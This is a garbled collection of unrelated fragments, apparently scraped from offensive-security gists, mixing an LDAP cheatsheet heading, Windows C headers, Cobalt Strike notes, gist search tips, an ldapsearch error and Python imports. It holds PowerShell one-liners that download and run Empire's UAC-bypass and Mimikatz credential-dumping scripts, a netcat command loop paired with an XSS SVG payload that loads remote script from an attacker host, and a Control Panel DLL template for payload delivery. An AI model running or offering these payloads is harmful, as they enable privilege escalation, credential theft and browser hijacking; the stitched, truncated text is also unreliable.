title | author | date | source | notoc |
---|---|---|---|---|
LDAP Search Filter Cheatsheet | Jon LaBelle | January 4, 2021 | | true |
#include "stdafx.h"
#include <windows.h>
#include <Winbase.h>
#include <Wtsapi32.h>
#include <Userenv.h>
#include <malloc.h>
#pragma comment(lib, "Wtsapi32.lib")
#pragma comment(lib, "Userenv.lib")
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
MANUAL COBALT STRIKE
!---------------------------------------------------Standard Commands---------------------------------------------------!
Creating a load
Attacks->Packages->
interact - choose an agent
help -> will show a list of commands
help [command] will show help for a specific command
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
Enter this in the search box along with your search terms:
Get all gists from the user santisbon.
user:santisbon
Find all gists with a .yml extension.
extension:yml
Find all gists with HTML files.
language:html
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <Windows.h>
extern "C" __declspec(dllexport) LONG CplApplet()
{
    MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0);
    return 1;
}
Signing
simple bind over insecure channel
# ldapsearch -xLLL -H ldap://ad1.win2016.test -b 'DC=win2016,DC=test' -D 'CN=Administrator,CN=Users,DC=win2016,DC=test' -W samaccountname=Administrator DN
Enter LDAP Password:
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090256, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v3839
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup